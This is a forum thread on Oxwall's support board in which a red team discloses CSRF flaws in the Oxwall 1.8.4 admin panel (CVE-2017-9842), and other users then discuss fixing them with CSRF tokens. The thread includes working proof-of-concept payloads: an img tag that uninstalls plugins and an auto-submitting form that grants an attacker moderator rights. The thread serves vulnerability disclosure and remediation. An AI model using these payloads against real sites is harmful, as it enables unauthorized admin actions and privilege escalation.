We build. You grow.

Get best community software here

Start a social network, a fan-site, an education project with oxwall - free opensource community software

Get started
Google+

Medium Severity CSRF in Admin Panel | Forum

Topic location: Forum home » Support » Bug reports and troubleshooting
Securify Red Team
Securify Red Team Jun 24 '17
This vulnerability was found in a default installation of Oxwall 1.8.4. No codes were modified. 


Admin panel of Oxwall has some series of vulnerabilities. We will explain the two important ones that we discovered. 


1) Removing and installing plugins

Admin has access to remove or install plugin to create a better experience of the user. Both requests either to remove or install plugin is done through a GET request. This request does not verify how the call is made. 


Prerequisite for this attack is the admin must be logged into the site. Once that is done, you can send them a link that has a HTML code like following: <img src="[oxwall_url]/lab1/admin/plugins/uninstall/key/[plugin_name]/">


What this does is that, in the attacker's website, img src things it is a image so it tries to fetch it. While doing that, it sends a GET request. If the admin is logged in, this GET request instead will delete the installed plugin. 


Same thing happens with installing plugin as well. 



Another one:Attacker can add themselves as moderator

Admin has right to change a roll of a user and make them a moderator. This request is a POST request and looks sth like this: 


POST /lab1/admin/permissions/add-moderator/ HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: [redacted]
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Cookie: __test=[redacted]; f28f354131a7769ac167eb81af76baf4=[redacted]; base_language_id=1; adminToken=[redacted]; ow_login=[redacted]
Connection: close
Upgrade-Insecure-Requests: 1username=[user's username]



This can result in a CSRF attack. Through an external website, following code can be made:


<form name="addmoderator" action="[oxwallurl]/lab1/admin/permissions/add-moderator/" method="post">
<input type="hidden" name="username" value="[attacker's username]">
</form>
<script>
window.onload = function(){
document.forms['addmoderator'].submit()
</script>



When the admin visits the website, attacker's account is now given Moderator access.CSRF token is a must in this case. 


CVE assigned for this: CVE-2017-9842 this morning. 


It is recommended that a fix is added as soon as possible and pushed out to all the users.

The Forum post is edited by Securify Red Team Jun 24 '17
#1
AppXprt
AppXprt Jun 25 '17
We will have to work together on this one, I don't want to break anything for OxWall users.


I think we could really use an OxWall Dev right about now... :-D


Taking a look into ow_utilities/csrf.php (CSRF Tokens)


Looks like this already has everything needed to gen and verify tokens, so it just needs to be used in these places I believe.
UTIL_Csrf::generateToken()

UTIL_Csrf::isTokenValid($token)

UTIL_Csrf::getTokenList()

Used for forms as a hidden div:

        $formNameHidden->setValue(UTIL_Csrf::generateToken());

and then is checked for in $this (iteration over elements):

        if ( $this->getElement(self::ELEMENT_CSRF_TOKEN) != null 

            && ( !isset($data[self::ELEMENT_CSRF_TOKEN]) || !UTIL_Csrf::isTokenValid($data[self::ELEMENT_CSRF_TOKEN] )) 

        ){

            $valid = false;

            OW::getFeedback()->error(OW::getLanguage()->text("base", "invalid_csrf_token_error_message"));

        }



The Forum post is edited by AppXprt Jun 25 '17
#2
Securify Red Team
Securify Red Team Jun 25 '17
Quote from Zach Jones We will have to work together on this one, I don't want to break anything for OxWall users.


I think we could really use an OxWall Dev right about now... :-D


Taking a look into ow_utilities/csrf.php (CSRF Tokens)


Looks like this already has everything needed to gen and verify tokens, so it just needs to be used in these places I believe.
UTIL_Csrf::generateToken()

UTIL_Csrf::isTokenValid($token)

UTIL_Csrf::getTokenList()

Used for forms as a hidden div:

        $formNameHidden->setValue(UTIL_Csrf::generateToken());

and then is checked for in $this (iteration over elements):

        if ( $this->getElement(self::ELEMENT_CSRF_TOKEN) != null 

            && ( !isset($data[self::ELEMENT_CSRF_TOKEN]) || !UTIL_Csrf::isTokenValid($data[self::ELEMENT_CSRF_TOKEN] )) 

        ){

            $valid = false;

            OW::getFeedback()->error(OW::getLanguage()->text("base", "invalid_csrf_token_error_message"));

        }
Yup there are tokens in many places but sadly not on these :( and yes we need oxwall devs now
#3
AppXprt
AppXprt Jun 25 '17

For the first CSRF, we're looking for function: permissions_moders_add_moder (?) in ow_system_plugins/admin/


Hidden div for token may be able to be added to:

ow_system_plugins/admin/views/controllers/permissions_moderators.html

#4
AppXprt
AppXprt Jun 25 '17
CSRF_TOKEN usage and element creation:
ow_core/form.php
#5
AppXprt
AppXprt May 18 '19
BuMp


This and multiple other vulnerabilities need to be addressed, we need to know the future of Oxwall.


I will only disclose issues and vulnerabilities to the Oxwall Team and fellow Active Developers.


Let's all help make this a more secure CMS.

The Forum post is edited by AppXprt May 18 '19
#6
Oxwall Germany Club
Oxwall Germany Jun 11 '19
The issues were reported to the Oxwall development team.
#7
Start | Demo | About | Policies & Licenses | Blog | Contact Us | Oxwall Foundation | Roadmap | Developer Central | Oxwall hosting | Contribute | Partners | Donation | Community software | Dating software
© Copyright Oxwall Software
Oxwall Community Software